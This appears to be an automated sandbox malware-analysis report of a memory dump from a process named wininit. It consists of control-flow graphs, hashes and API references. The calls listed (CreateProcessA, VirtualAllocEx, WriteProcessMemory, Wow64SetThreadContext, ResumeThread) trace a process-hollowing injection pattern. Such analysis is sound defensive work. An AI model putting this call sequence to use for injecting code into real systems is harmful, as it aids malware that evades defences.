                                                      control_flow_graph 0 1c1047-1c1049 1 1c104c 0->1 2 1c1053-1c1054 0->2 3 1c10ac 1->3 4 1c104e 1->4 5 1c10b4 2->5 6 1c1055-1c1064 2->6 9 1c110c-1c1111 3->9 10 1c10ae 3->10 4->2 11 1c1114-1c1205 call 1c06f8 * 2 call 1c0708 * 2 call 1c0718 call 1c0728 call 1c0738 5->11 12 1c10b5-1c10c1 5->12 7 1c10c4-1c10c6 6->7 8 1c1066-1c1088 6->8 13 1c10c7-1c10dd 7->13 14 1c10b1-1c10b3 7->14 8->3 9->11 10->14 49 1c120b-1c123a call 1c0748 11->49 12->7 15 1c10df-1c10f4 13->15 16 1c10f6-1c110b 13->16 14->5 15->16 16->9 51 1c123f-1c13f9 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 49->51 74 1c13fe 51->74 75 1c1408-1c1489 call 1c0798 call 1c07a8 74->75 85 1c148f-1c14a2 75->85 86 1c15d5-1c15f7 75->86 87 1c14ab-1c14d4 85->87 88 1c14a4-1c14aa 85->88 96 1c15f9-1c15ff 86->96 97 1c1605-1c1621 86->97 90 1c14da-1c14f7 87->90 91 1c1d84-1c1db7 87->91 88->87 90->91 92 1c14fd-1c1512 90->92 103 1c1dba-1c1dbc 91->103 92->91 95 1c1518-1c1541 call 1c07b8 92->95 95->91 105 1c1547-1c1570 95->105 100 1c1601 96->100 101 1c1603 96->101 110 1c1628-1c163f 97->110 100->97 101->97 108 1c1dbe-1c1dc8 103->108 109 1c1dcf-1c1df4 103->109 106 1c1575-1c1581 105->106 107 1c1572 105->107 106->91 111 1c1587-1c159d 106->111 107->106 108->103 112 1c1dca-1c1dce 108->112 117 1c1df6-1c1e0b call 1c0fc4 109->117 115 1c1645-1c1647 110->115 111->91 113 1c15a3-1c15b6 111->113 113->91 116 1c15bc-1c15cf 113->116 119 1c1651-1c1655 115->119 116->85 116->86 121 1c1e0d-1c1e11 117->121 122 1c165b-1c165f 119->122 122->91 123 1c1665-1c1673 122->123 123->91 125 1c1679-1c1702 123->125 135 1c170c-1c1715 125->135 136 1c171e-1c1d83 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c07c8 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c07d8 call 1c07e8 call 1c07f8 call 1c0748 call 1c0768 call 1c0778 call 1c0808 call 1c0818 call 1c0828 call 1c0ccc call 1c0cdc call 1c0cec * 6 call 1c0cfc call 1c0d0c call 1c0768 call 1c06b0 call 1c0d1c call 1c0d2c 135->136
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $&$&$7$9$=$C$E$E$_$j$x$$p
                                                      • API String ID: 0-468349182
                                                      • Opcode ID: 495062f14521fa0dcfe6f49d719793313f376a12b98163bbef8db821146f15f9
                                                      • Instruction ID: 26f1cb23581397c40a8ece0ec81101d87a9f5e7abed5ee4e25c1032862b46a65
                                                      • Opcode Fuzzy Hash: 495062f14521fa0dcfe6f49d719793313f376a12b98163bbef8db821146f15f9
                                                      • Instruction Fuzzy Hash: 09825930A00705CFC755EF78C854BADB7B2BFAA300F5186ADE449AB361DB71A985CB41

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 1c04c0-1c1489 call 1c06f8 * 2 call 1c0708 * 2 call 1c0718 call 1c0728 call 1c0738 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c0798 call 1c07a8 313 1c148f-1c14a2 239->313 314 1c15d5-1c15f7 239->314 315 1c14ab-1c14d4 313->315 316 1c14a4-1c14aa 313->316 324 1c15f9-1c15ff 314->324 325 1c1605-1c165f 314->325 318 1c14da-1c14f7 315->318 319 1c1d84-1c1db7 315->319 316->315 318->319 320 1c14fd-1c1512 318->320 331 1c1dba-1c1dbc 319->331 320->319 323 1c1518-1c1541 call 1c07b8 320->323 323->319 333 1c1547-1c1570 323->333 328 1c1601 324->328 329 1c1603 324->329 325->319 351 1c1665-1c1673 325->351 328->325 329->325 336 1c1dbe-1c1dc8 331->336 337 1c1dcf-1c1df4 331->337 334 1c1575-1c1581 333->334 335 1c1572 333->335 334->319 339 1c1587-1c159d 334->339 335->334 336->331 340 1c1dca-1c1dce 336->340 345 1c1df6-1c1e0b call 1c0fc4 337->345 339->319 341 1c15a3-1c15b6 339->341 341->319 344 1c15bc-1c15cf 341->344 344->313 344->314 349 1c1e0d-1c1e11 345->349 351->319 353 1c1679-1c1715 351->353 364 1c171e-1c1d83 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c07c8 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c07d8 call 1c07e8 call 1c07f8 call 1c0748 call 1c0768 call 1c0778 call 1c0808 call 1c0818 call 1c0828 call 1c0ccc call 1c0cdc call 1c0cec * 6 call 1c0cfc call 1c0d0c call 1c0768 call 1c06b0 call 1c0d1c call 1c0d2c 353->364
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $&$&$7$9$=$C$E$E$_$j$x$$p
                                                      • API String ID: 0-468349182
                                                      • Opcode ID: e23cdeedd3878a7813609d005517d547403c0c9b6ecfada1bef2ffce373e6311
                                                      • Instruction ID: 9195e4e9096cb77178722a76ae02c6a1e1cccf6b1bca549fb7593b0438ba52e1
                                                      • Opcode Fuzzy Hash: e23cdeedd3878a7813609d005517d547403c0c9b6ecfada1bef2ffce373e6311
                                                      • Instruction Fuzzy Hash: CF824930A00705CFC755EF78C854BAEB7B2BF99300F5186ADE44AAB361DB71A985CB41

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 467 1c108f-1c1092 468 1c109b-1c10a2 467->468 469 1c1094 467->469 474 1c10ab-1c10ac 468->474 475 1c10a4 468->475 470 1c10f4 469->470 471 1c1096-1c1098 469->471 472 1c10f6-1c110b 470->472 471->468 480 1c110c-1c1111 472->480 474->480 483 1c10ae 474->483 478 1c1104-1c1105 475->478 479 1c10a5-1c10a6 475->479 481 1c10ef 478->481 482 1c1106-1c110b 478->482 479->474 484 1c1114-1c1205 call 1c06f8 * 2 call 1c0708 * 2 call 1c0718 call 1c0728 call 1c0738 480->484 481->470 482->480 486 1c10b1-1c10b4 483->486 522 1c120b-1c123a call 1c0748 484->522 486->484 489 1c10b5-1c10c6 486->489 489->486 492 1c10c7-1c10dd 489->492 492->472 494 1c10df-1c10ee 492->494 494->470 524 1c123f-1c13f9 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 522->524 547 1c13fe 524->547 548 1c1408-1c1489 call 1c0798 call 1c07a8 547->548 558 1c148f-1c14a2 548->558 559 1c15d5-1c15f7 548->559 560 1c14ab-1c14d4 558->560 561 1c14a4-1c14aa 558->561 569 1c15f9-1c15ff 559->569 570 1c1605-1c1621 559->570 563 1c14da-1c14f7 560->563 564 1c1d84-1c1db7 560->564 561->560 563->564 565 1c14fd-1c1512 563->565 576 1c1dba-1c1dbc 564->576 565->564 568 1c1518-1c1541 call 1c07b8 565->568 568->564 578 1c1547-1c1570 568->578 573 1c1601 569->573 574 1c1603 569->574 583 1c1628-1c163f 570->583 573->570 574->570 581 1c1dbe-1c1dc8 576->581 582 1c1dcf-1c1df4 576->582 579 1c1575-1c1581 578->579 580 1c1572 578->580 579->564 584 1c1587-1c159d 579->584 580->579 581->576 585 1c1dca-1c1dce 581->585 590 1c1df6-1c1e0b call 1c0fc4 582->590 588 1c1645-1c1647 583->588 584->564 586 1c15a3-1c15b6 584->586 586->564 589 1c15bc-1c15cf 586->589 592 1c1651-1c1655 588->592 589->558 589->559 594 1c1e0d-1c1e11 590->594 595 1c165b-1c165f 592->595 595->564 596 1c1665-1c1673 595->596 596->564 598 1c1679-1c1702 596->598 608 1c170c-1c1715 598->608 609 1c171e-1c1d83 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c07c8 call 1c0748 call 1c0758 call 1c0768 call 1c0778 call 1c0788 call 1c07d8 call 1c07e8 call 1c07f8 call 1c0748 call 1c0768 call 1c0778 call 1c0808 call 1c0818 call 1c0828 call 1c0ccc call 1c0cdc call 1c0cec * 6 call 1c0cfc call 1c0d0c call 1c0768 call 1c06b0 call 1c0d1c call 1c0d2c 608->609
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $&$&$7$9$=$C$E$E$_$j$x$$p
                                                      • API String ID: 0-468349182
                                                      • Opcode ID: c653383619d36f3952f8a07f9ae1206cebe241d382f4d013e92987ab59acd7fb
                                                      • Instruction ID: bf9a1cee1c750a748ec803d5605269ba4d0208d90235b4017253d115f447cad8
                                                      • Opcode Fuzzy Hash: c653383619d36f3952f8a07f9ae1206cebe241d382f4d013e92987ab59acd7fb
                                                      • Instruction Fuzzy Hash: A2823830A00B05CFC755EB78C854BADB7B2BFA9300F5186ADE449AB361DB71A985CF41

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 712 1c2808-1c2830 713 1c2837-1c28f3 712->713 714 1c2832 712->714 717 1c28f8-1c2905 713->717 718 1c28f5-1c291b 713->718 714->713 717->718 720 1c2e0b-1c2e4d 718->720 721 1c2921-1c294b 718->721 730 1c2e50-1c2e54 720->730 724 1c3018-1c3024 721->724 725 1c2951-1c2969 721->725 727 1c302a-1c3033 724->727 726 1c296f-1c2970 725->726 725->727 729 1c2ffe-1c300a 726->729 733 1c3039-1c3045 727->733 731 1c2975-1c2981 729->731 732 1c3010-1c3017 729->732 734 1c2e5a-1c2e60 730->734 735 1c2a26-1c2a2a 730->735 738 1c2988-1c29a3 731->738 739 1c2983 731->739 744 1c304b-1c3057 733->744 734->720 740 1c2e62-1c2ebd 734->740 736 1c2a3c-1c2a42 735->736 737 1c2a2c-1c2a3a 735->737 742 1c2a87-1c2a8b 736->742 741 1c2a9a-1c2acc 737->741 738->733 743 1c29a9-1c29ce 738->743 739->738 759 1c2ebf-1c2ef2 740->759 760 1c2ef4-1c2f1e 740->760 765 1c2ace-1c2ada 741->765 766 1c2af6 741->766 745 1c2a8d 742->745 746 1c2a44-1c2a50 742->746 743->744 757 1c29d4-1c29d6 743->757 748 1c305d-1c3064 744->748 753 1c2a90-1c2a94 745->753 750 1c2a57-1c2a5f 746->750 751 1c2a52 746->751 755 1c2a84 750->755 756 1c2a61-1c2a75 750->756 751->750 753->741 758 1c2a0c-1c2a23 753->758 755->742 762 1c29d9-1c29e4 756->762 763 1c2a7b-1c2a82 756->763 757->762 758->735 773 1c2f27-1c2fa6 759->773 760->773 762->748 767 1c29ea-1c2a07 762->767 763->745 769 1c2adc-1c2ae2 765->769 770 1c2ae4-1c2aea 765->770 772 1c2afc-1c2b29 766->772 767->753 774 1c2af4 769->774 770->774 779 1c2b78-1c2c0b 772->779 780 1c2b2b-1c2b63 772->780 787 1c2fad-1c2fc0 773->787 774->772 795 1c2c0d 779->795 796 1c2c14-1c2c15 779->796 788 1c2fcf-1c2fd4 780->788 787->788 789 1c2feb-1c2ffb 788->789 790 1c2fd6-1c2fe4 788->790 789->729 790->789 795->796 797 1c2c66-1c2c6c 796->797 798 1c2c6e-1c2d30 797->798 799 1c2c17-1c2c36 797->799 810 1c2d71-1c2d75 798->810 811 1c2d32-1c2d6b 798->811 800 1c2c3d-1c2c63 799->800 801 1c2c38 799->801 800->797 801->800 812 1c2db6-1c2dba 810->812 813 1c2d77-1c2db0 810->813 811->810 814 1c2dbc-1c2df5 812->814 815 1c2dfb-1c2dff 812->815 813->812 814->815 815->740 817 1c2e01-1c2e09 815->817 817->730
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$:$pp$~
                                                      • API String ID: 0-1820105848
                                                      • Opcode ID: 4db3922b066f6ec9c200003f0b7e59de64677064c5e1e42b1081a80cdb732643
                                                      • Instruction ID: 15988083dba95528919756eb2773242049a3f70a67c7195c82040e318e20e147
                                                      • Opcode Fuzzy Hash: 4db3922b066f6ec9c200003f0b7e59de64677064c5e1e42b1081a80cdb732643
                                                      • Instruction Fuzzy Hash: 5C42C175A00228DFDB19CFA8C984F99BBB2BF59304F1580E9E509AB261DB31DD91DF10

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 820 1ce0f4-1ce199 822 1ce19b-1ce1b2 820->822 823 1ce1e2-1ce20a 820->823 822->823 828 1ce1b4-1ce1b9 822->828 826 1ce20c-1ce220 823->826 827 1ce250-1ce2a6 823->827 826->827 835 1ce222-1ce227 826->835 837 1ce2ec-1ce3e3 CreateProcessA 827->837 838 1ce2a8-1ce2bc 827->838 829 1ce1dc-1ce1df 828->829 830 1ce1bb-1ce1c5 828->830 829->823 832 1ce1c9-1ce1d8 830->832 833 1ce1c7 830->833 832->832 836 1ce1da 832->836 833->832 839 1ce229-1ce233 835->839 840 1ce24a-1ce24d 835->840 836->829 856 1ce3ec-1ce4d1 837->856 857 1ce3e5-1ce3eb 837->857 838->837 845 1ce2be-1ce2c3 838->845 842 1ce235 839->842 843 1ce237-1ce246 839->843 840->827 842->843 843->843 846 1ce248 843->846 847 1ce2c5-1ce2cf 845->847 848 1ce2e6-1ce2e9 845->848 846->840 850 1ce2d1 847->850 851 1ce2d3-1ce2e2 847->851 848->837 850->851 851->851 852 1ce2e4 851->852 852->848 869 1ce4e1-1ce4e5 856->869 870 1ce4d3-1ce4d7 856->870 857->856 872 1ce4f5-1ce4f9 869->872 873 1ce4e7-1ce4eb 869->873 870->869 871 1ce4d9 870->871 871->869 874 1ce509-1ce50d 872->874 875 1ce4fb-1ce4ff 872->875 873->872 876 1ce4ed 873->876 878 1ce50f-1ce538 874->878 879 1ce543-1ce54e 874->879 875->874 877 1ce501 875->877 876->872 877->874 878->879 882 1ce54f 879->882 882->882
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001CE3C7
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: fb8ef25c39a8426d49c96558dbdcc67f4ef39250c525b4186ac8c008dec7c5c7
                                                      • Instruction ID: 6a8cd089efaaa2b2116839aaad8e01f6dd308565e32d6813dde793a02d445759
                                                      • Opcode Fuzzy Hash: fb8ef25c39a8426d49c96558dbdcc67f4ef39250c525b4186ac8c008dec7c5c7
                                                      • Instruction Fuzzy Hash: 3DC13670D002598FDF24CFA8C845BEEBBF1BB59300F0095AAE459B7250DB749A85CF95

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 884 1ce100-1ce199 886 1ce19b-1ce1b2 884->886 887 1ce1e2-1ce20a 884->887 886->887 892 1ce1b4-1ce1b9 886->892 890 1ce20c-1ce220 887->890 891 1ce250-1ce2a6 887->891 890->891 899 1ce222-1ce227 890->899 901 1ce2ec-1ce3e3 CreateProcessA 891->901 902 1ce2a8-1ce2bc 891->902 893 1ce1dc-1ce1df 892->893 894 1ce1bb-1ce1c5 892->894 893->887 896 1ce1c9-1ce1d8 894->896 897 1ce1c7 894->897 896->896 900 1ce1da 896->900 897->896 903 1ce229-1ce233 899->903 904 1ce24a-1ce24d 899->904 900->893 920 1ce3ec-1ce4d1 901->920 921 1ce3e5-1ce3eb 901->921 902->901 909 1ce2be-1ce2c3 902->909 906 1ce235 903->906 907 1ce237-1ce246 903->907 904->891 906->907 907->907 910 1ce248 907->910 911 1ce2c5-1ce2cf 909->911 912 1ce2e6-1ce2e9 909->912 910->904 914 1ce2d1 911->914 915 1ce2d3-1ce2e2 911->915 912->901 914->915 915->915 916 1ce2e4 915->916 916->912 933 1ce4e1-1ce4e5 920->933 934 1ce4d3-1ce4d7 920->934 921->920 936 1ce4f5-1ce4f9 933->936 937 1ce4e7-1ce4eb 933->937 934->933 935 1ce4d9 934->935 935->933 938 1ce509-1ce50d 936->938 939 1ce4fb-1ce4ff 936->939 937->936 940 1ce4ed 937->940 942 1ce50f-1ce538 938->942 943 1ce543-1ce54e 938->943 939->938 941 1ce501 939->941 940->936 941->938 942->943 946 1ce54f 943->946 946->946
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001CE3C7
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 7b86d86e482b9cb3c15f692f3e92022d492d867b1a4a1ffd7259f3f28ec106e0
                                                      • Instruction ID: 6315d00ac2e44a086789b85c48fb16be299881cb5827b049d3b3a63db641946f
                                                      • Opcode Fuzzy Hash: 7b86d86e482b9cb3c15f692f3e92022d492d867b1a4a1ffd7259f3f28ec106e0
                                                      • Instruction Fuzzy Hash: 99C12670D002598FDF24CFA8C845BEEBBF1BB59304F0095AAE419B7250DB749A85CF95

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 948 1cdd61-1cddd3 950 1cddea-1cde51 WriteProcessMemory 948->950 951 1cddd5-1cdde7 948->951 953 1cde5a-1cdeac 950->953 954 1cde53-1cde59 950->954 951->950 954->953
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CDE3B
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 138869b8b5061fa6daf39c78eabb327ab4eda3cec4e03e1bd306aaec62e924d7
                                                      • Instruction ID: 00a1a31bd187bee057f871d9ebd65609c6ff0ed61cd27ee9ae0280a6577b211b
                                                      • Opcode Fuzzy Hash: 138869b8b5061fa6daf39c78eabb327ab4eda3cec4e03e1bd306aaec62e924d7
                                                      • Instruction Fuzzy Hash: BD41BAB4D012489FCF10CFA9D984AEEFBF1BB49310F20942AE815BB250D334AA45CF64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 959 1cdd68-1cddd3 961 1cddea-1cde51 WriteProcessMemory 959->961 962 1cddd5-1cdde7 959->962 964 1cde5a-1cdeac 961->964 965 1cde53-1cde59 961->965 962->961 965->964
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CDE3B
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: c04486745d0e53a26739b85140a67bc717d140d3b74a72918c5a80ebea55d3fd
                                                      • Instruction ID: 41341d5c6a2cb499b3cd46717ff2cd1909fb527178fb9e2a8d37aceba373f2d5
                                                      • Opcode Fuzzy Hash: c04486745d0e53a26739b85140a67bc717d140d3b74a72918c5a80ebea55d3fd
                                                      • Instruction Fuzzy Hash: A241A9B5D012589FCF00CFA9D984AEEFBF1BB49314F20942AE814BB250D334AA45CF64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 970 1cdec1-1cdf90 ReadProcessMemory 973 1cdf99-1cdfeb 970->973 974 1cdf92-1cdf98 970->974 974->973
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CDF7A
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 820be3d30b09cf403fa66a6fd1e27a5292b4ab3d6086d9f7b3ce867542d83814
                                                      • Instruction ID: 891e0d68b89e80b8cffd7139cc9935bce2cb05efcbf0a760905207ee898219d6
                                                      • Opcode Fuzzy Hash: 820be3d30b09cf403fa66a6fd1e27a5292b4ab3d6086d9f7b3ce867542d83814
                                                      • Instruction Fuzzy Hash: 4541CCB4D042589FCF10CFA9E984AEEFBB1BF59310F10942AE815B7250C735A946CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 979 1cdec8-1cdf90 ReadProcessMemory 982 1cdf99-1cdfeb 979->982 983 1cdf92-1cdf98 979->983 983->982
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CDF7A
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 320ada3422172dfc1325724dfc380f86f39dd9d53b0f68722202c93532f75b70
                                                      • Instruction ID: 5122a9881082d3a4a83911e9a1dd31c65ed26f686971ebd47ea2d475d4b67574
                                                      • Opcode Fuzzy Hash: 320ada3422172dfc1325724dfc380f86f39dd9d53b0f68722202c93532f75b70
                                                      • Instruction Fuzzy Hash: 4741ABB5D002589FCF10CFA9E984AEEFBB1BF49310F10942AE815B7210D735A945CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 988 1cdc39-1cdd00 VirtualAllocEx 991 1cdd09-1cdd53 988->991 992 1cdd02-1cdd08 988->992 992->991
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001CDCEA
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 6a4cb5e8c090ee97433e7fd808c85ff755a71d794459051b241b660ce11942e7
                                                      • Instruction ID: af411370adafe679425a4fc354671f497e1473966ee88d5164c278825448abf3
                                                      • Opcode Fuzzy Hash: 6a4cb5e8c090ee97433e7fd808c85ff755a71d794459051b241b660ce11942e7
                                                      • Instruction Fuzzy Hash: E441A9B8D002489FCF10CFA9E984AEEFBB1BF49310F20942AE815BB250D735A945CF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 997 1cdc40-1cdd00 VirtualAllocEx 1000 1cdd09-1cdd53 997->1000 1001 1cdd02-1cdd08 997->1001 1001->1000
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001CDCEA
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 44b412539b8422822088032756ab666989fe259675337357af00a944ac8e2cf9
                                                      • Instruction ID: 8e3c7743f4cd30234cd632edd9b0efdc42e940cf060e6457551169735144c1fa
                                                      • Opcode Fuzzy Hash: 44b412539b8422822088032756ab666989fe259675337357af00a944ac8e2cf9
                                                      • Instruction Fuzzy Hash: F74199B8D002589FCF10CFA9E984AEEFBB1BB49310F10942AE815B7314D735A945CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1006 1cdb08-1cdb70 1009 1cdb87-1cdbd5 Wow64SetThreadContext 1006->1009 1010 1cdb72-1cdb84 1006->1010 1012 1cdbde-1cdc2a 1009->1012 1013 1cdbd7-1cdbdd 1009->1013 1010->1009 1013->1012
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 001CDBBF
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: be4c6220c232307cb3fc5eca830b046f1834e582061df3ad22865a34d8909ebc
                                                      • Instruction ID: b808c5d449da6f9f67aa509a30b9240c5f81afa3499de2548252a226a7ee9f55
                                                      • Opcode Fuzzy Hash: be4c6220c232307cb3fc5eca830b046f1834e582061df3ad22865a34d8909ebc
                                                      • Instruction Fuzzy Hash: A441BCB5D002589FCB14CFA9D984AEEFBB1BF49314F24842AE418B7240D779A949CF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1018 1cdb10-1cdb70 1020 1cdb87-1cdbd5 Wow64SetThreadContext 1018->1020 1021 1cdb72-1cdb84 1018->1021 1023 1cdbde-1cdc2a 1020->1023 1024 1cdbd7-1cdbdd 1020->1024 1021->1020 1024->1023
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 001CDBBF
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 14b288f12469159546cf5f97725ad0c9e091594b423a9e283df7bfd0a8c0cc10
                                                      • Instruction ID: fed38ebb0bbb323c037f5dfd00a84fee26c796d6f09789294b9985fcbb16f3f3
                                                      • Opcode Fuzzy Hash: 14b288f12469159546cf5f97725ad0c9e091594b423a9e283df7bfd0a8c0cc10
                                                      • Instruction Fuzzy Hash: B041ABB4D002589FCF14CFA9D984AEEFBB1BF49314F24842AE418B7244D778A989CF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1029 1cd5e1-1cd67c ResumeThread 1032 1cd67e-1cd684 1029->1032 1033 1cd685-1cd6c7 1029->1033 1032->1033
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 001CD666
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.388442945.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1c0000_wininit.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: ac7b1e18103cf1e28f3c50ce7f7dc1b8b93513077a25a6cbae91016b582b54bb
                                                      • Instruction ID: 10988046d04492ceba9f9f9de3b77617e17048fe93e791cd612766d422ca7bf4
                                                      • Opcode Fuzzy Hash: ac7b1e18103cf1e28f3c50ce7f7dc1b8b93513077a25a6cbae91016b582b54bb
